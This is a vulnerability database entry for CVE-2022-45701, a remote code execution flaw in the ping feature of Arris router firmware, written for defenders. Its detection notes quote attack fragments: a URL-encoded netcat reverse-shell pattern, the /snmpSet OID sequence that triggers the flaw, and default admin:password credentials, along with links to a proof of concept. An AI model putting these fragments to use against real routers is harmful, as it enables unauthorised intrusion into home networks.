CVE-2022-45701
published 2023-02-17CVE-2022-45701: Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.
PriorityP275high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
45.31%
98.6th percentile
Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| commscope | arris_sbg10_firmware | <= 9.1.103 | — |
| commscope | arris_tg2482a_firmware | <= 9.1.103 | — |
| commscope | arris_tg2492_firmware | <= 9.1.103 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP GET requests to /snmpSet endpoint on Arris routers with OID parameters from the 1.3.6.1.4.1.4115.1.20.1.1.7.* subtree, especially OID .7.2.0 containing shell metacharacters or URL-encoded command injection strings (e.g., %20-e%20/bin/sh). ↗
- →Detect HTTP GET requests to /login with an 'arg' query parameter containing a base64-encoded credential string, followed immediately by requests to /snmpSet with a 'credential' cookie — this sequence is characteristic of the exploit authentication flow. ↗
- →Alert on URL-encoded netcat reverse shell patterns in HTTP query parameters targeting router management interfaces: look for 'nc%20' combined with '%20-e%20/bin/sh' in GET request URIs. ↗
- →Flag sequential SNMP-over-HTTP SET operations to OIDs 1.3.6.1.4.1.4115.1.20.1.1.7.1.0 through .9.0 in rapid succession via GET /snmpSet, as this is the exact OID sequence used to arm and trigger the ping-based RCE. ↗
- ·The exploit requires prior authentication (valid admin credentials). The default credentials used in the PoC are admin:password — deployments using default credentials are immediately exploitable. ↗
- ·The exploit was tested against multiple Arris device models (TG2482A, TG2492, SBG10), so detection rules should not be scoped to a single model. ↗
- ·The RCE is delivered via the router's ping utility feature through SNMP OID manipulation over HTTP, not through a traditional SNMP UDP port — network-layer SNMP filtering alone will not block this attack vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://arris.comhttps://packetstormsecurity.com/files/171001/Arris-Router-Firmware-9.1.103-Remote-Code-Execution.htmlhttps://github.com/yerodin/CVE-2022-45701http://arris.comhttps://packetstormsecurity.com/files/171001/Arris-Router-Firmware-9.1.103-Remote-Code-Execution.htmlhttps://github.com/yerodin/CVE-2022-45701
2023-02-17
Published